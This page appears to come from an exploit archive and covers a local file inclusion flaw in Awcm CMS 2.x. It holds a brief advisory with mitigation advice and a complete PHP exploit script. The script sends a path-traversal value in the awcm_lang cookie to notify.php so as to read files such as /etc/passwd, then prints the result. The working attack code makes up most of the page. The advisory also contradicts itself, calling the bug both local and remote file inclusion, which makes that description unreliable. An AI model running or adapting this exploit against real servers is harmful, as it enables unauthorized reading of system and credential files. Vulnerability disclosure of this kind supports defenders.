header-logo
Suggest Exploit
vendor:
Awcm Cms
by:
SwEET-DeViL
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Awcm Cms
Affected Version From: 2.x
Affected Version To: 2.x
Patch Exists: NO
Related CWE: N/A
CPE: awcm-cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

Awcm Cms Local File Inclusion Vulnerability

Awcm Cms is vulnerable to Local File Inclusion vulnerability. An attacker can exploit this vulnerability to include a remote file on the web server. This vulnerability exists due to insufficient sanitization of user-supplied input to the 'v' parameter in 'notify.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious input to the vulnerable script. Successful exploitation of this vulnerability can result in arbitrary remote file inclusion.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in the application. It is recommended to use whitelisting techniques to ensure that only expected characters are accepted in the input.
Source

Exploit-DB raw data:

# Software Link: http://www.awcm-cms.com/
# Version: 2.x
# Tested on: Lunix

Exploit :

<?php

print("
------------------------------------------------------------
| Awcm Cms Local File Inclusion Vulnerability
| By SwEET-DeViL
| x0.root(at)gmail.com
| example
|
| Exploit.php ".$argv[0]." example.com /path/ ../../../../../../../../etc/passwd
------------------------------------------------------------
");
$host =$argv[1];//;
$Path = "http://".$host.$argv[2];
       $CURL_in ="GET ".$Path."/notify.php?v=a HTTP/1.0\r\n";
       $CURL_in.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1)\r\n";
       $CURL_in.="Pragma: no-cache\r\n";
       $CURL_in.="Cookie: awcm_lang=".$argv[3]."".";\r\n";
       $CURL_in.="Connection: Close\r\n\r\n";

       if ( empty($argv[3]) ){
               echo "\n[-] Error : Exploit failed\n";
               die;
       }

       $FoN = @fsockopen($host, 80);
       if(!$FoN){
               echo "\n[-] Error : Can't connect to ".$host." !!\n";
               die;
       }

       fputs($FoN, $CURL_in);
       while (!feof($FoN)) $data .= fread($FoN, 1024);
       fclose($FoN);

       $error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );
       if ( !empty($error_1) ){
               echo "\n[-] Error : 404 Not Found. \n";
               die;
       }

       $error_2 = strstr( $data, "HTTP/1.1 406 Not Acceptable" );
       if ( !empty($error_2) ){
               echo "\n[-] Error : 406 Not Acceptable. \n";
               die;
       }



$EXc = explode("</head>",$data);
$EXx = explode("<head>",$EXc[1]);
$CODE = strip_tags($EXx[0]);
$CODE2 = preg_replace("/\r|\t/",'',$CODE);
$CODE2 = trim($CODE2);

if (empty($CODE2)){
print ('

[-] Error : Sorry! File not Found

');
}else{
print ('
[+]
------------------------------------------------------------
').$CODE2;



print ('

------------------------------------------------------------
');

}

?>

Navigation

Suggest Exploit

Services By CQR